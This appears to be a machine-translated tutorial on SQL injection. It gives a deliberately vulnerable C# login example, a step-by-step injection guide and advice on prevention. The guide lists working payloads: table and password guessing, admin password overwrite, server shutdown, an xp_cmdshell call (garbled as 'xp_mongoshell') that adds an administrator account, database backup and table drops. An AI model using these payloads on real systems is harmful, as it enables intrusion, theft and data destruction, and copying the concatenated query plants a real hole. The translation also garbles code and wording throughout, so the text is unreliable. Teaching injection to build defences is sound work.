Introduction
Some websites directly splice SQL statements with user input for query and other operations, and expose error information to users. This gives unscrupulous students the opportunity to input some strange query strings and splice them into specific SQL statements to inject them. Not only can important information of the database be obtained, but the entire table can be deleted even if the permissions are not set. Therefore, the SQL injection vulnerability is quite serious. I found that when I was just learning to write a website, I also rely on splicing SQL statements to eat ......
Example
To better learn and understand the SQL injection method, we made an example webpage with the following interface:
The code for logging on to this part is as follows. Note that line 1 uses the concatenated SQL statement:
Private
Void
Login()
{
StringUname = tbName. Text;
StringPwd = tbPassword. Text;
StringSqlCmd = "select * from [Users] where UserName = '" + uname + "'";
StringSqlCmdRep = sqlCmd. Replace ("Users", "XXX"). Replace ("UserName", "XXX ");
LbSQL. Text = sqlCmdRep;
Try
{
DataTable dt = DataSQLServer. GetDataTable (sqlCmd );
GvResult. DataSource = dt;
GvResult. DataBind ();
If(Dt. Rows. Count =
1& Pwd = dt. Rows [
0] ["Password"]. ToString ())
{
LbRes. Text = dt. Rows [
0] ["UserName"] + "Login Success! ";
}
Else
If(Dt. Rows. Count =
0)
{
LbRes. Text = uname + "not exist! ";
}
Else
{
LbRes. Text = "Login Fail! ";
}
}
Catch(Exception ex)
{
LbRes. Text = "Error:" + ex. Message;
}
}
The detailed injection methods are not described in detail. You are welcome to download the sample program for practical drills. Click the "injection Guide" on the interface to provide detailed injection instructions:
1. Test whether injection can be performed.
XXX
3. Guess the table name
Admin 'or 0> (select count (*) from [XXX]) --
You can use the following method to obtain the table name:
Admin 'and (Select Top 1 name from sysobjects where xtype = 'U')> 0 --
4. Guess the column name
Admin 'and 0 <(select count (XXX) from [Users]) --
The name of the column is grayed out:
Admin 'and (Select top 1 col_name (object_id ('users'), 3) from [Users])> 0 --
5. Guess the password length
Admin 'and 1 = (select count (*) from [Users] where len (Password) <XXX )--
6. Guess the password
Admin 'and 1 = (select count (*) from [Users] where left (Password, 2) = 'xx ')--
Bytes ----------------------------------------------------------------------------------------------
When detecting the table name and list, you can use the hacker weapon to directly modify the admin password or perform worse damage:
Admin '; update [Users] set Password = '000000' where UserName = 'admin '--
Bytes ----------------------------------------------------------------------------------------------
Other bad behaviors:
1. Directly disable even SQL services
Admin '; shutdown --
2. If the sa user is used and the user may be attacked: add the user to an even machine and join an organization:
Admin '; exec master .. xp_mongoshell "net user name password/add "--
Admin '; exec master .. xp_mongoshell "net localgroup name administrators/add "--
3. Back up the database directly and download it. It is very bad. We recommend that you do not use it for me.
Admin '; backup database Test to disk = 'd: "1. db '--
4. Delete the table directly. Use it with caution.
Admin '; drop table abc --
Bytes ----------------------------------------------------------------------------------------------
Other experiences:
1. Bypass single quotes Filtering
Where xtype = 'U' ==> where xtype = char (85)
Where name = 'user' ==> where name = nchar (29992) + nchar (25143)
2. Obtain the Database Name
Admin 'and db_name ()> 0 --
Bytes ----------------------------------------------------------------------------------------------
The following describes how to securely assemble SQL statements.
Download the sample program: SQLInjection.rar
Probe
- It is very simple to enter a single quotation mark (') to check whether the page has an error. If the page has an error and the error information is exposed to you, that would be great.
- Check the database from the error information, such as Access and SQL Server. There are some differences in SQL statements of different databases
- Static code analysis: checks from the Code whether the SQL statement is composed of strings.
Implementation Method
For details, see the sample Website.
Hazards
- What do you do when the server is remotely controlled.
- Stealing, stealing confidential information in the database for personal gain or other reasons.
- Destructive: directly destroys the database.
- Modify or tamper with data. For example, you can query and modify a score through a university score.
- I have never done either.
Prevention
The example also illustrates how to prevent SQL injection. Here we will refine the four magic weapons to prevent SQL injection:
- Minimum permission Principle
- In particular, do not use dbo or sa accounts for different types of actions or create different accounts. The minimum permission principle applies to all security-related scenarios.
- Filter user input on the server
- We want to convert or filter special characters, such as single quotes, double quotation marks, semicolons, commas, colons, and Connection Numbers. Use strong data types. For example, you need to enter an integer, it is necessary to convert the data entered by the user into an integer; limit the length of the user input, and so on. These checks should be run on the server. Anything submitted by the client is untrusted.
- Create SQL statements in a safe way
- Do not splice SQL statements with any evil strings. Use a Parameter object, for example, in C:
StringSqlText = "select * from [Users] where UserName = @ Name ";
SqlParameter nameParm =NewSqlParameter ("Name", uname );
SqlCmd. CommandText = sqlText;
SqlCmd. Parameters. Add (nameParm );
- Do not expose error messages to users
- When an SQL running error occurs, do not display all the error information returned by the database to the user. The error information will often reveal some details about the database design.
Note: many people may have told you that using stored procedures can protect against SQL injection attacks. This is wrong! This can only prevent certain types of attacks. For example, the sp_GetName stored procedure exists. The Code is as follows:
- StringName = ...;// Name from user
SqlConnection conn =NewSqlConnection (...);
Conn. Open ();
StringSqlString = @ "exec sp_GetName '" + name + "'";
SqlCommand cmd =NewSqlCommand (sqlString, conn );
- We try to enter "Black 'or 1 = 1 --", but the following operation is legal:
Exec sp_GetName 'black' insert into Users values (2008, 'green ')--'
References
Michael Howard, David LeBlanc. "Writing Secure Code"
- Mike Andrews, James A. Whittaker "How to Break Web Software"
Http://www.secnumen.com/technology/anquanwenzhai.htm
